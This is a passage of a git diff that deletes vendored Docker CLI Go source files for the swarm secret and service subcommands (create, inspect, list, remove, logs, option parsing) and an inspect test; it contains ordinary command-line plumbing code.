-			Labels: runconfigopts.ConvertKVStringsToMap(options.labels.GetAll()),
-		},
-		Data: secretData,
-	}
-
-	r, err := client.SecretCreate(ctx, spec)
-	if err != nil {
-		return err
-	}
-
-	fmt.Fprintln(dockerCli.Out(), r.ID)
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/secret/inspect.go b/vendor/github.com/docker/docker/cli/command/secret/inspect.go
deleted file mode 100644
index 0a8bd4a23f..0000000000
--- a/vendor/github.com/docker/docker/cli/command/secret/inspect.go
+++ /dev/null
@@ -1,45 +0,0 @@
-package secret
-
-import (
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/cli/command/inspect"
-	"github.com/spf13/cobra"
-	"golang.org/x/net/context"
-)
-
-type inspectOptions struct {
-	names  []string
-	format string
-}
-
-func newSecretInspectCommand(dockerCli *command.DockerCli) *cobra.Command {
-	opts := inspectOptions{}
-	cmd := &cobra.Command{
-		Use:   "inspect [OPTIONS] SECRET [SECRET...]",
-		Short: "Display detailed information on one or more secrets",
-		Args:  cli.RequiresMinArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.names = args
-			return runSecretInspect(dockerCli, opts)
-		},
-	}
-
-	cmd.Flags().StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template")
-	return cmd
-}
-
-func runSecretInspect(dockerCli *command.DockerCli, opts inspectOptions) error {
-	client := dockerCli.Client()
-	ctx := context.Background()
-
-	ids, err := getCliRequestedSecretIDs(ctx, client, opts.names)
-	if err != nil {
-		return err
-	}
-	getRef := func(id string) (interface{}, []byte, error) {
-		return client.SecretInspectWithRaw(ctx, id)
-	}
-
-	return inspect.Inspect(dockerCli.Out(), ids, opts.format, getRef)
-}
diff --git a/vendor/github.com/docker/docker/cli/command/secret/ls.go b/vendor/github.com/docker/docker/cli/command/secret/ls.go
deleted file mode 100644
index faeab314b7..0000000000
--- a/vendor/github.com/docker/docker/cli/command/secret/ls.go
+++ /dev/null
@@ -1,68 +0,0 @@
-package secret
-
-import (
-	"fmt"
-	"text/tabwriter"
-	"time"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/go-units"
-	"github.com/spf13/cobra"
-	"golang.org/x/net/context"
-)
-
-type listOptions struct {
-	quiet bool
-}
-
-func newSecretListCommand(dockerCli *command.DockerCli) *cobra.Command {
-	opts := listOptions{}
-
-	cmd := &cobra.Command{
-		Use:     "ls [OPTIONS]",
-		Aliases: []string{"list"},
-		Short:   "List secrets",
-		Args:    cli.NoArgs,
-		RunE: func(cmd *cobra.Command, args []string) error {
-			return runSecretList(dockerCli, opts)
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display IDs")
-
-	return cmd
-}
-
-func runSecretList(dockerCli *command.DockerCli, opts listOptions) error {
-	client := dockerCli.Client()
-	ctx := context.Background()
-
-	secrets, err := client.SecretList(ctx, types.SecretListOptions{})
-	if err != nil {
-		return err
-	}
-
-	w := tabwriter.NewWriter(dockerCli.Out(), 20, 1, 3, ' ', 0)
-	if opts.quiet {
-		for _, s := range secrets {
-			fmt.Fprintf(w, "%s\n", s.ID)
-		}
-	} else {
-		fmt.Fprintf(w, "ID\tNAME\tCREATED\tUPDATED")
-		fmt.Fprintf(w, "\n")
-
-		for _, s := range secrets {
-			created := units.HumanDuration(time.Now().UTC().Sub(s.Meta.CreatedAt)) + " ago"
-			updated := units.HumanDuration(time.Now().UTC().Sub(s.Meta.UpdatedAt)) + " ago"
-
-			fmt.Fprintf(w, "%s\t%s\t%s\t%s\n", s.ID, s.Spec.Annotations.Name, created, updated)
-		}
-	}
-
-	w.Flush()
-
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/secret/remove.go b/vendor/github.com/docker/docker/cli/command/secret/remove.go
deleted file mode 100644
index f45a619f6a..0000000000
--- a/vendor/github.com/docker/docker/cli/command/secret/remove.go
+++ /dev/null
@@ -1,57 +0,0 @@
-package secret
-
-import (
-	"fmt"
-	"strings"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/spf13/cobra"
-	"golang.org/x/net/context"
-)
-
-type removeOptions struct {
-	names []string
-}
-
-func newSecretRemoveCommand(dockerCli *command.DockerCli) *cobra.Command {
-	return &cobra.Command{
-		Use:     "rm SECRET [SECRET...]",
-		Aliases: []string{"remove"},
-		Short:   "Remove one or more secrets",
-		Args:    cli.RequiresMinArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts := removeOptions{
-				names: args,
-			}
-			return runSecretRemove(dockerCli, opts)
-		},
-	}
-}
-
-func runSecretRemove(dockerCli *command.DockerCli, opts removeOptions) error {
-	client := dockerCli.Client()
-	ctx := context.Background()
-
-	ids, err := getCliRequestedSecretIDs(ctx, client, opts.names)
-	if err != nil {
-		return err
-	}
-
-	var errs []string
-
-	for _, id := range ids {
-		if err := client.SecretRemove(ctx, id); err != nil {
-			errs = append(errs, err.Error())
-			continue
-		}
-
-		fmt.Fprintln(dockerCli.Out(), id)
-	}
-
-	if len(errs) > 0 {
-		return fmt.Errorf("%s", strings.Join(errs, "\n"))
-	}
-
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/secret/utils.go b/vendor/github.com/docker/docker/cli/command/secret/utils.go
deleted file mode 100644
index 11d31ffd16..0000000000
--- a/vendor/github.com/docker/docker/cli/command/secret/utils.go
+++ /dev/null
@@ -1,76 +0,0 @@
-package secret
-
-import (
-	"fmt"
-	"strings"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/api/types/filters"
-	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/client"
-	"golang.org/x/net/context"
-)
-
-// GetSecretsByNameOrIDPrefixes returns secrets given a list of ids or names
-func GetSecretsByNameOrIDPrefixes(ctx context.Context, client client.APIClient, terms []string) ([]swarm.Secret, error) {
-	args := filters.NewArgs()
-	for _, n := range terms {
-		args.Add("names", n)
-		args.Add("id", n)
-	}
-
-	return client.SecretList(ctx, types.SecretListOptions{
-		Filters: args,
-	})
-}
-
-func getCliRequestedSecretIDs(ctx context.Context, client client.APIClient, terms []string) ([]string, error) {
-	secrets, err := GetSecretsByNameOrIDPrefixes(ctx, client, terms)
-	if err != nil {
-		return nil, err
-	}
-
-	if len(secrets) > 0 {
-		found := make(map[string]struct{})
-	next:
-		for _, term := range terms {
-			// attempt to lookup secret by full ID
-			for _, s := range secrets {
-				if s.ID == term {
-					found[s.ID] = struct{}{}
-					continue next
-				}
-			}
-			// attempt to lookup secret by full name
-			for _, s := range secrets {
-				if s.Spec.Annotations.Name == term {
-					found[s.ID] = struct{}{}
-					continue next
-				}
-			}
-			// attempt to lookup secret by partial ID (prefix)
-			// return error if more than one matches found (ambiguous)
-			n := 0
-			for _, s := range secrets {
-				if strings.HasPrefix(s.ID, term) {
-					found[s.ID] = struct{}{}
-					n++
-				}
-			}
-			if n > 1 {
-				return nil, fmt.Errorf("secret %s is ambiguous (%d matches found)", term, n)
-			}
-		}
-
-		// We already collected all the IDs found.
-		// Now we will remove duplicates by converting the map to slice
-		ids := []string{}
-		for id := range found {
-			ids = append(ids, id)
-		}
-
-		return ids, nil
-	}
-
-	return terms, nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/service/cmd.go b/vendor/github.com/docker/docker/cli/command/service/cmd.go
deleted file mode 100644
index 796fe926c3..0000000000
--- a/vendor/github.com/docker/docker/cli/command/service/cmd.go
+++ /dev/null
@@ -1,29 +0,0 @@
-package service
-
-import (
-	"github.com/spf13/cobra"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-)
-
-// NewServiceCommand returns a cobra command for `service` subcommands
-func NewServiceCommand(dockerCli *command.DockerCli) *cobra.Command {
-	cmd := &cobra.Command{
-		Use:   "service",
-		Short: "Manage services",
-		Args:  cli.NoArgs,
-		RunE:  dockerCli.ShowHelp,
-	}
-	cmd.AddCommand(
-		newCreateCommand(dockerCli),
-		newInspectCommand(dockerCli),
-		newPsCommand(dockerCli),
-		newListCommand(dockerCli),
-		newRemoveCommand(dockerCli),
-		newScaleCommand(dockerCli),
-		newUpdateCommand(dockerCli),
-		newLogsCommand(dockerCli),
-	)
-	return cmd
-}
diff --git a/vendor/github.com/docker/docker/cli/command/service/create.go b/vendor/github.com/docker/docker/cli/command/service/create.go
deleted file mode 100644
index 1355c19c65..0000000000
--- a/vendor/github.com/docker/docker/cli/command/service/create.go
+++ /dev/null
@@ -1,100 +0,0 @@
-package service
-
-import (
-	"fmt"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/spf13/cobra"
-	"golang.org/x/net/context"
-)
-
-func newCreateCommand(dockerCli *command.DockerCli) *cobra.Command {
-	opts := newServiceOptions()
-
-	cmd := &cobra.Command{
-		Use:   "create [OPTIONS] IMAGE [COMMAND] [ARG...]",
-		Short: "Create a new service",
-		Args:  cli.RequiresMinArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.image = args[0]
-			if len(args) > 1 {
-				opts.args = args[1:]
-			}
-			return runCreate(dockerCli, opts)
-		},
-	}
-	flags := cmd.Flags()
-	flags.StringVar(&opts.mode, flagMode, "replicated", "Service mode (replicated or global)")
-	flags.StringVar(&opts.name, flagName, "", "Service name")
-
-	addServiceFlags(cmd, opts)
-
-	flags.VarP(&opts.labels, flagLabel, "l", "Service labels")
-	flags.Var(&opts.containerLabels, flagContainerLabel, "Container labels")
-	flags.VarP(&opts.env, flagEnv, "e", "Set environment variables")
-	flags.Var(&opts.envFile, flagEnvFile, "Read in a file of environment variables")
-	flags.Var(&opts.mounts, flagMount, "Attach a filesystem mount to the service")
-	flags.Var(&opts.constraints, flagConstraint, "Placement constraints")
-	flags.Var(&opts.networks, flagNetwork, "Network attachments")
-	flags.Var(&opts.secrets, flagSecret, "Specify secrets to expose to the service")
-	flags.VarP(&opts.endpoint.publishPorts, flagPublish, "p", "Publish a port as a node port")
-	flags.Var(&opts.groups, flagGroup, "Set one or more supplementary user groups for the container")
-	flags.Var(&opts.dns, flagDNS, "Set custom DNS servers")
-	flags.Var(&opts.dnsOption, flagDNSOption, "Set DNS options")
-	flags.Var(&opts.dnsSearch, flagDNSSearch, "Set custom DNS search domains")
-	flags.Var(&opts.hosts, flagHost, "Set one or more custom host-to-IP mappings (host:ip)")
-
-	flags.SetInterspersed(false)
-	return cmd
-}
-
-func runCreate(dockerCli *command.DockerCli, opts *serviceOptions) error {
-	apiClient := dockerCli.Client()
-	createOpts := types.ServiceCreateOptions{}
-
-	service, err := opts.ToService()
-	if err != nil {
-		return err
-	}
-
-	specifiedSecrets := opts.secrets.Value()
-	if len(specifiedSecrets) > 0 {
-		// parse and validate secrets
-		secrets, err := ParseSecrets(apiClient, specifiedSecrets)
-		if err != nil {
-			return err
-		}
-		service.TaskTemplate.ContainerSpec.Secrets = secrets
-
-	}
-
-	ctx := context.Background()
-
-	if err := resolveServiceImageDigest(dockerCli, &service); err != nil {
-		return err
-	}
-
-	// only send auth if flag was set
-	if opts.registryAuth {
-		// Retrieve encoded auth token from the image reference
-		encodedAuth, err := command.RetrieveAuthTokenFromImage(ctx, dockerCli, opts.image)
-		if err != nil {
-			return err
-		}
-		createOpts.EncodedRegistryAuth = encodedAuth
-	}
-
-	response, err := apiClient.ServiceCreate(ctx, service, createOpts)
-	if err != nil {
-		return err
-	}
-
-	for _, warning := range response.Warnings {
-		fmt.Fprintln(dockerCli.Err(), warning)
-	}
-
-	fmt.Fprintf(dockerCli.Out(), "%s\n", response.ID)
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/service/inspect.go b/vendor/github.com/docker/docker/cli/command/service/inspect.go
deleted file mode 100644
index deb701bf6d..0000000000
--- a/vendor/github.com/docker/docker/cli/command/service/inspect.go
+++ /dev/null
@@ -1,84 +0,0 @@
-package service
-
-import (
-	"fmt"
-	"strings"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/cli/command/formatter"
-	apiclient "github.com/docker/docker/client"
-	"github.com/spf13/cobra"
-)
-
-type inspectOptions struct {
-	refs   []string
-	format string
-	pretty bool
-}
-
-func newInspectCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts inspectOptions
-
-	cmd := &cobra.Command{
-		Use:   "inspect [OPTIONS] SERVICE [SERVICE...]",
-		Short: "Display detailed information on one or more services",
-		Args:  cli.RequiresMinArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.refs = args
-
-			if opts.pretty && len(opts.format) > 0 {
-				return fmt.Errorf("--format is incompatible with human friendly format")
-			}
-			return runInspect(dockerCli, opts)
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template")
-	flags.BoolVar(&opts.pretty, "pretty", false, "Print the information in a human friendly format.")
-	return cmd
-}
-
-func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error {
-	client := dockerCli.Client()
-	ctx := context.Background()
-
-	if opts.pretty {
-		opts.format = "pretty"
-	}
-
-	getRef := func(ref string) (interface{}, []byte, error) {
-		service, _, err := client.ServiceInspectWithRaw(ctx, ref)
-		if err == nil || !apiclient.IsErrServiceNotFound(err) {
-			return service, nil, err
-		}
-		return nil, nil, fmt.Errorf("Error: no such service: %s", ref)
-	}
-
-	f := opts.format
-	if len(f) == 0 {
-		f = "raw"
-		if len(dockerCli.ConfigFile().ServiceInspectFormat) > 0 {
-			f = dockerCli.ConfigFile().ServiceInspectFormat
-		}
-	}
-
-	// check if the user is trying to apply a template to the pretty format, which
-	// is not supported
-	if strings.HasPrefix(f, "pretty") && f != "pretty" {
-		return fmt.Errorf("Cannot supply extra formatting options to the pretty template")
-	}
-
-	serviceCtx := formatter.Context{
-		Output: dockerCli.Out(),
-		Format: formatter.NewServiceFormat(f),
-	}
-
-	if err := formatter.ServiceInspectWrite(serviceCtx, opts.refs, getRef); err != nil {
-		return cli.StatusError{StatusCode: 1, Status: err.Error()}
-	}
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/service/inspect_test.go b/vendor/github.com/docker/docker/cli/command/service/inspect_test.go
deleted file mode 100644
index 04a65080c7..0000000000
--- a/vendor/github.com/docker/docker/cli/command/service/inspect_test.go
+++ /dev/null
@@ -1,129 +0,0 @@
-package service
-
-import (
-	"bytes"
-	"encoding/json"
-	"strings"
-	"testing"
-	"time"
-
-	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/cli/command/formatter"
-	"github.com/docker/docker/pkg/testutil/assert"
-)
-
-func formatServiceInspect(t *testing.T, format formatter.Format, now time.Time) string {
-	b := new(bytes.Buffer)
-
-	endpointSpec := &swarm.EndpointSpec{
-		Mode: "vip",
-		Ports: []swarm.PortConfig{
-			{
-				Protocol:   swarm.PortConfigProtocolTCP,
-				TargetPort: 5000,
-			},
-		},
-	}
-
-	two := uint64(2)
-
-	s := swarm.Service{
-		ID: "de179gar9d0o7ltdybungplod",
-		Meta: swarm.Meta{
-			Version:   swarm.Version{Index: 315},
-			CreatedAt: now,
-			UpdatedAt: now,
-		},
-		Spec: swarm.ServiceSpec{
-			Annotations: swarm.Annotations{
-				Name:   "my_service",
-				Labels: map[string]string{"com.label": "foo"},
-			},
-			TaskTemplate: swarm.TaskSpec{
-				ContainerSpec: swarm.ContainerSpec{
-					Image: "foo/bar@sha256:this_is_a_test",
-				},
-			},
-			Mode: swarm.ServiceMode{
-				Replicated: &swarm.ReplicatedService{
-					Replicas: &two,
-				},
-			},
-			UpdateConfig: nil,
-			Networks: []swarm.NetworkAttachmentConfig{
-				{
-					Target:  "5vpyomhb6ievnk0i0o60gcnei",
-					Aliases: []string{"web"},
-				},
-			},
-			EndpointSpec: endpointSpec,
-		},
-		Endpoint: swarm.Endpoint{
-			Spec: *endpointSpec,
-			Ports: []swarm.PortConfig{
-				{
-					Protocol:      swarm.PortConfigProtocolTCP,
-					TargetPort:    5000,
-					PublishedPort: 30000,
-				},
-			},
-			VirtualIPs: []swarm.EndpointVirtualIP{
-				{
-					NetworkID: "6o4107cj2jx9tihgb0jyts6pj",
-					Addr:      "10.255.0.4/16",
-				},
-			},
-		},
-		UpdateStatus: swarm.UpdateStatus{
-			StartedAt:   now,
-			CompletedAt: now,
-		},
-	}
-
-	ctx := formatter.Context{
-		Output: b,
-		Format: format,
-	}
-
-	err := formatter.ServiceInspectWrite(ctx, []string{"de179gar9d0o7ltdybungplod"}, func(ref string) (interface{}, []byte, error) {
-		return s, nil, nil
-	})
-	if err != nil {
-		t.Fatal(err)
-	}
-	return b.String()
-}
-
-func TestPrettyPrintWithNoUpdateConfig(t *testing.T) {
-	s := formatServiceInspect(t, formatter.NewServiceFormat("pretty"), time.Now())
-	if strings.Contains(s, "UpdateStatus") {
-		t.Fatal("Pretty print failed before parsing UpdateStatus")
-	}
-}
-
-func TestJSONFormatWithNoUpdateConfig(t *testing.T) {
-	now := time.Now()
-	// s1: [{"ID":..}]
-	// s2: {"ID":..}
-	s1 := formatServiceInspect(t, formatter.NewServiceFormat(""), now)
-	t.Log("// s1")
-	t.Logf("%s", s1)
-	s2 := formatServiceInspect(t, formatter.NewServiceFormat("{{json .}}"), now)
-	t.Log("// s2")
-	t.Logf("%s", s2)
-	var m1Wrap []map[string]interface{}
-	if err := json.Unmarshal([]byte(s1), &m1Wrap); err != nil {
-		t.Fatal(err)
-	}
-	if len(m1Wrap) != 1 {
-		t.Fatalf("strange s1=%s", s1)
-	}
-	m1 := m1Wrap[0]
-	t.Logf("m1=%+v", m1)
-	var m2 map[string]interface{}
-	if err := json.Unmarshal([]byte(s2), &m2); err != nil {
-		t.Fatal(err)
-	}
-	t.Logf("m2=%+v", m2)
-	assert.DeepEqual(t, m2, m1)
-}
diff --git a/vendor/github.com/docker/docker/cli/command/service/list.go b/vendor/github.com/docker/docker/cli/command/service/list.go
deleted file mode 100644
index 724126079c..0000000000
--- a/vendor/github.com/docker/docker/cli/command/service/list.go
+++ /dev/null
@@ -1,158 +0,0 @@
-package service
-
-import (
-	"fmt"
-	"io"
-	"text/tabwriter"
-
-	distreference "github.com/docker/distribution/reference"
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/api/types/filters"
-	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/opts"
-	"github.com/docker/docker/pkg/stringid"
-	"github.com/spf13/cobra"
-	"golang.org/x/net/context"
-)
-
-const (
-	listItemFmt = "%s\t%s\t%s\t%s\t%s\n"
-)
-
-type listOptions struct {
-	quiet  bool
-	filter opts.FilterOpt
-}
-
-func newListCommand(dockerCli *command.DockerCli) *cobra.Command {
-	opts := listOptions{filter: opts.NewFilterOpt()}
-
-	cmd := &cobra.Command{
-		Use:     "ls [OPTIONS]",
-		Aliases: []string{"list"},
-		Short:   "List services",
-		Args:    cli.NoArgs,
-		RunE: func(cmd *cobra.Command, args []string) error {
-			return runList(dockerCli, opts)
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display IDs")
-	flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided")
-
-	return cmd
-}
-
-func runList(dockerCli *command.DockerCli, opts listOptions) error {
-	ctx := context.Background()
-	client := dockerCli.Client()
-	out := dockerCli.Out()
-
-	services, err := client.ServiceList(ctx, types.ServiceListOptions{Filters: opts.filter.Value()})
-	if err != nil {
-		return err
-	}
-
-	if len(services) > 0 && !opts.quiet {
-		// only non-empty services and not quiet, should we call TaskList and NodeList api
-		taskFilter := filters.NewArgs()
-		for _, service := range services {
-			taskFilter.Add("service", service.ID)
-		}
-
-		tasks, err := client.TaskList(ctx, types.TaskListOptions{Filters: taskFilter})
-		if err != nil {
-			return err
-		}
-
-		nodes, err := client.NodeList(ctx, types.NodeListOptions{})
-		if err != nil {
-			return err
-		}
-
-		PrintNotQuiet(out, services, nodes, tasks)
-	} else if !opts.quiet {
-		// no services and not quiet, print only one line with columns ID, NAME, MODE, REPLICAS...
-		PrintNotQuiet(out, services, []swarm.Node{}, []swarm.Task{})
-	} else {
-		PrintQuiet(out, services)
-	}
-
-	return nil
-}
-
-// PrintNotQuiet shows service list in a non-quiet way.
-// Besides this, command `docker stack services xxx` will call this, too.
-func PrintNotQuiet(out io.Writer, services []swarm.Service, nodes []swarm.Node, tasks []swarm.Task) {
-	activeNodes := make(map[string]struct{})
-	for _, n := range nodes {
-		if n.Status.State != swarm.NodeStateDown {
-			activeNodes[n.ID] = struct{}{}
-		}
-	}
-
-	running := map[string]int{}
-	tasksNoShutdown := map[string]int{}
-
-	for _, task := range tasks {
-		if task.DesiredState != swarm.TaskStateShutdown {
-			tasksNoShutdown[task.ServiceID]++
-		}
-
-		if _, nodeActive := activeNodes[task.NodeID]; nodeActive && task.Status.State == swarm.TaskStateRunning {
-			running[task.ServiceID]++
-		}
-	}
-
-	printTable(out, services, running, tasksNoShutdown)
-}
-
-func printTable(out io.Writer, services []swarm.Service, running, tasksNoShutdown map[string]int) {
-	writer := tabwriter.NewWriter(out, 0, 4, 2, ' ', 0)
-
-	// Ignore flushing errors
-	defer writer.Flush()
-
-	fmt.Fprintf(writer, listItemFmt, "ID", "NAME", "MODE", "REPLICAS", "IMAGE")
-
-	for _, service := range services {
-		mode := ""
-		replicas := ""
-		if service.Spec.Mode.Replicated != nil && service.Spec.Mode.Replicated.Replicas != nil {
-			mode = "replicated"
-			replicas = fmt.Sprintf("%d/%d", running[service.ID], *service.Spec.Mode.Replicated.Replicas)
-		} else if service.Spec.Mode.Global != nil {
-			mode = "global"
-			replicas = fmt.Sprintf("%d/%d", running[service.ID], tasksNoShutdown[service.ID])
-		}
-		image := service.Spec.TaskTemplate.ContainerSpec.Image
-		ref, err := distreference.ParseNamed(image)
-		if err == nil {
-			// update image string for display
-			namedTagged, ok := ref.(distreference.NamedTagged)
-			if ok {
-				image = namedTagged.Name() + ":" + namedTagged.Tag()
-			}
-		}
-
-		fmt.Fprintf(
-			writer,
-			listItemFmt,
-			stringid.TruncateID(service.ID),
-			service.Spec.Name,
-			mode,
-			replicas,
-			image)
-	}
-}
-
-// PrintQuiet shows service list in a quiet way.
-// Besides this, command `docker stack services xxx` will call this, too.
-func PrintQuiet(out io.Writer, services []swarm.Service) {
-	for _, service := range services {
-		fmt.Fprintln(out, service.ID)
-	}
-}
diff --git a/vendor/github.com/docker/docker/cli/command/service/logs.go b/vendor/github.com/docker/docker/cli/command/service/logs.go
deleted file mode 100644
index 19d3d9a488..0000000000
--- a/vendor/github.com/docker/docker/cli/command/service/logs.go
+++ /dev/null
@@ -1,163 +0,0 @@
-package service
-
-import (
-	"bytes"
-	"fmt"
-	"io"
-	"strings"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/cli/command/idresolver"
-	"github.com/docker/docker/pkg/stdcopy"
-	"github.com/spf13/cobra"
-)
-
-type logsOptions struct {
-	noResolve  bool
-	follow     bool
-	since      string
-	timestamps bool
-	details    bool
-	tail       string
-
-	service string
-}
-
-func newLogsCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts logsOptions
-
-	cmd := &cobra.Command{
-		Use:   "logs [OPTIONS] SERVICE",
-		Short: "Fetch the logs of a service",
-		Args:  cli.ExactArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.service = args[0]
-			return runLogs(dockerCli, &opts)
-		},
-		Tags: map[string]string{"experimental": ""},
-	}
-
-	flags := cmd.Flags()
-	flags.BoolVar(&opts.noResolve, "no-resolve", false, "Do not map IDs to Names")
-	flags.BoolVarP(&opts.follow, "follow", "f", false, "Follow log output")
-	flags.StringVar(&opts.since, "since", "", "Show logs since timestamp")
-	flags.BoolVarP(&opts.timestamps, "timestamps", "t", false, "Show timestamps")
-	flags.BoolVar(&opts.details, "details", false, "Show extra details provided to logs")
-	flags.StringVar(&opts.tail, "tail", "all", "Number of lines to show from the end of the logs")
-	return cmd
-}
-
-func runLogs(dockerCli *command.DockerCli, opts *logsOptions) error {
-	ctx := context.Background()
-
-	options := types.ContainerLogsOptions{
-		ShowStdout: true,
-		ShowStderr: true,
-		Since:      opts.since,
-		Timestamps: opts.timestamps,
-		Follow:     opts.follow,
-		Tail:       opts.tail,
-		Details:    opts.details,
-	}
-
-	client := dockerCli.Client()
-	responseBody, err := client.ServiceLogs(ctx, opts.service, options)
-	if err != nil {
-		return err
-	}
-	defer responseBody.Close()
-
-	resolver := idresolver.New(client, opts.noResolve)
-
-	stdout := &logWriter{ctx: ctx, opts: opts, r: resolver, w: dockerCli.Out()}
-	stderr := &logWriter{ctx: ctx, opts: opts, r: resolver, w: dockerCli.Err()}
-
-	// TODO(aluzzardi): Do an io.Copy for services with TTY enabled.
-	_, err = stdcopy.StdCopy(stdout, stderr, responseBody)
-	return err
-}
-
-type logWriter struct {
-	ctx  context.Context
-	opts *logsOptions
-	r    *idresolver.IDResolver
-	w    io.Writer
-}
-
-func (lw *logWriter) Write(buf []byte) (int, error) {
-	contextIndex := 0
-	numParts := 2
-	if lw.opts.timestamps {
-		contextIndex++
-		numParts++
-	}
-
-	parts := bytes.SplitN(buf, []byte(" "), numParts)
-	if len(parts) != numParts {
-		return 0, fmt.Errorf("invalid context in log message: %v", string(buf))
-	}
-
-	taskName, nodeName, err := lw.parseContext(string(parts[contextIndex]))
-	if err != nil {
-		return 0, err
-	}
-
-	output := []byte{}
-	for i, part := range parts {
-		// First part doesn't get space separation.
-		if i > 0 {
-			output = append(output, []byte(" ")...)
-		}
-
-		if i == contextIndex {
-			// TODO(aluzzardi): Consider constant padding.
-			output = append(output, []byte(fmt.Sprintf("%s@%s    |", taskName, nodeName))...)
-		} else {
-			output = append(output, part...)
-		}
-	}
-	_, err = lw.w.Write(output)
-	if err != nil {
-		return 0, err
-	}
-
-	return len(buf), nil
-}
-
-func (lw *logWriter) parseContext(input string) (string, string, error) {
-	context := make(map[string]string)
-
-	components := strings.Split(input, ",")
-	for _, component := range components {
-		parts := strings.SplitN(component, "=", 2)
-		if len(parts) != 2 {
-			return "", "", fmt.Errorf("invalid context: %s", input)
-		}
-		context[parts[0]] = parts[1]
-	}
-
-	taskID, ok := context["com.docker.swarm.task.id"]
-	if !ok {
-		return "", "", fmt.Errorf("missing task id in context: %s", input)
-	}
-	taskName, err := lw.r.Resolve(lw.ctx, swarm.Task{}, taskID)
-	if err != nil {
-		return "", "", err
-	}
-
-	nodeID, ok := context["com.docker.swarm.node.id"]
-	if !ok {
-		return "", "", fmt.Errorf("missing node id in context: %s", input)
-	}
-	nodeName, err := lw.r.Resolve(lw.ctx, swarm.Node{}, nodeID)
-	if err != nil {
-		return "", "", err
-	}
-
-	return taskName, nodeName, nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/service/opts.go b/vendor/github.com/docker/docker/cli/command/service/opts.go
deleted file mode 100644
index cbe544aacc..0000000000
--- a/vendor/github.com/docker/docker/cli/command/service/opts.go
+++ /dev/null
@@ -1,648 +0,0 @@
-package service
-
-import (
-	"encoding/csv"
-	"fmt"
-	"os"
-	"path/filepath"
-	"strconv"
-	"strings"
-	"time"
-
-	"github.com/docker/docker/api/types/container"
-	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/opts"
-	runconfigopts "github.com/docker/docker/runconfig/opts"
-	"github.com/docker/go-connections/nat"
-	units "github.com/docker/go-units"
-	"github.com/spf13/cobra"
-)
-
-type int64Value interface {
-	Value() int64
-}
-
-type memBytes int64
-
-func (m *memBytes) String() string {
-	return units.BytesSize(float64(m.Value()))
-}
-
-func (m *memBytes) Set(value string) error {
-	val, err := units.RAMInBytes(value)
-	*m = memBytes(val)
-	return err
-}
-
-func (m *memBytes) Type() string {
-	return "bytes"
-}
-
-func (m *memBytes) Value() int64 {
-	return int64(*m)
-}
-
-// PositiveDurationOpt is an option type for time.Duration that uses a pointer.
-// It bahave similarly to DurationOpt but only allows positive duration values.
-type PositiveDurationOpt struct {
-	DurationOpt
-}
-
-// Set a new value on the option. Setting a negative duration value will cause
-// an error to be returned.
-func (d *PositiveDurationOpt) Set(s string) error {
-	err := d.DurationOpt.Set(s)
-	if err != nil {
-		return err
-	}
-	if *d.DurationOpt.value < 0 {
-		return fmt.Errorf("duration cannot be negative")
-	}
-	return nil
-}
-
-// DurationOpt is an option type for time.Duration that uses a pointer. This
-// allows us to get nil values outside, instead of defaulting to 0
-type DurationOpt struct {
-	value *time.Duration
-}
-
-// Set a new value on the option
-func (d *DurationOpt) Set(s string) error {
-	v, err := time.ParseDuration(s)
-	d.value = &v
-	return err
-}
-
-// Type returns the type of this option, which will be displayed in `--help` output
-func (d *DurationOpt) Type() string {
-	return "duration"
-}
-
-// String returns a string repr of this option
-func (d *DurationOpt) String() string {
-	if d.value != nil {
-		return d.value.String()
-	}
-	return ""
-}
-
-// Value returns the time.Duration
-func (d *DurationOpt) Value() *time.Duration {
-	return d.value
-}
-
-// Uint64Opt represents a uint64.
-type Uint64Opt struct {
-	value *uint64
-}
-
-// Set a new value on the option
-func (i *Uint64Opt) Set(s string) error {
-	v, err := strconv.ParseUint(s, 0, 64)
-	i.value = &v
-	return err
-}
-
-// Type returns the type of this option, which will be displayed in `--help` output
-func (i *Uint64Opt) Type() string {
-	return "uint"
-}
-
-// String returns a string repr of this option
-func (i *Uint64Opt) String() string {
